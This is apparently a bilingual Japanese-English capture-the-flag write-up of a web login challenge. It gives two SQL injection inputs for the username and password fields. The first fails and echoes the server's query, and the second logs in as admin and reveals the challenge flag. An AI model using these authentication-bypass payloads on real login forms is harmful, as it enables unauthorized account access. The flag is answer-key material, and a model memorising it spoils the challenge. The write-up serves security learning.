WebページのURLが与えられた。
アクセスすると、usernameの入力欄、passwordの入力欄、Loginボタンがあった。
usernameに' or 1=1 --、passwordにaを入力してLoginボタンを押すと、以下が表示された。
An URL of a web page was given.
Hitting the Login button with username ' or 1=1 -- and password a, this was displayed:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a'' at line 1
Query: SELECT * From basic_accounts where username='' or 1=1 --' and password='a'
Nice try!
usernameに' or ('1'='1、passwordにa') or '1'='1を入力してLoginボタンを押すと、以下が表示された。
Hitting the Login button with username ' or ('1'='1 and password a') or '1'='1, this was displayed:
Welcome admin!!
flag{SQLi_with_b1rds_in_a_b34utiful_landscape}
Excellent work!! This is the flag!
この中にflagが含まれていた。
This display contained the flag.